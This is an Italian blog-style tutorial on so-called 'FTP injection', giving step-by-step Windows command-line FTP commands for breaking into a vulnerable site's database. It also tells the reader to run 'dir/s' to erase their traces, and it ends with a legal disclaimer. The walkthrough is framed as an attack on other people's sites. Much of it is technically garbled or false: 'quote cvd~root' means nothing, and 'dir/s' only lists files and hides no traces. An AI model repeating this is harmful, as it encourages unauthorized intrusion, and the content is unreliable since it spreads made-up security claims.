FTP injection è una tecnica di penetration testing che si basa sul bypassare i sistemi di sicurezza del protocollo FTP di un sito per riuscire ad accedere al database. Oramai solo pochi siti sono affetti da questa fulnerabilità, ma potremo sempre trovarci nella situazione in cui esista questa falla; come applicarla? Il processo è abbastanza semplice ed intuitivo, quindi partiamo subito a spiegare come funziona! Innanzitutto ci serviremo del prompt dei comandi (o cmd) di Windows; una volta aperta una scheda di prompt, digitiamo passo passo i vari comandi:

1. ftp

Cattura

2. open

Cattura1

3. ftp.sitovulnerabile.it

Cattura2

4. ftp.sitovulnerabile.it

Cattura4

5. Alla fase inserire password, premere invio

Cattura5

6. quote user ftp

Cattura6

7. quote cvd~root

Cattura7

8. quote pass ftp

Cattura8

9. dir

Cattura9

A questo punto recatevi sul sito il quale avete attaccato e aggiungete all’inizio della URL la dicitura ftp://sitovulnerabile.it; in tal modo avrete accesso al database del sito e potete compiere tutte le azioni che volete. Una volta terminate le operazioni, importante passaggio è digitare sul prompt dei comandi “dir/s”, per eliminare le vostre tracce.

Cattura10
Inutile ricordare che per qualsiasi uso scorretto che farete di questo articolo, noi non ci assumiamo alcuna responsabilità delle vostre azioni; pertanto ricordiamo che questi contenuti sono unicamente ed esclusivamente creati per fini informativi e non intendono incitare nessun terzo a compiere azioni illegali in rete, severamente punibili dalla legge.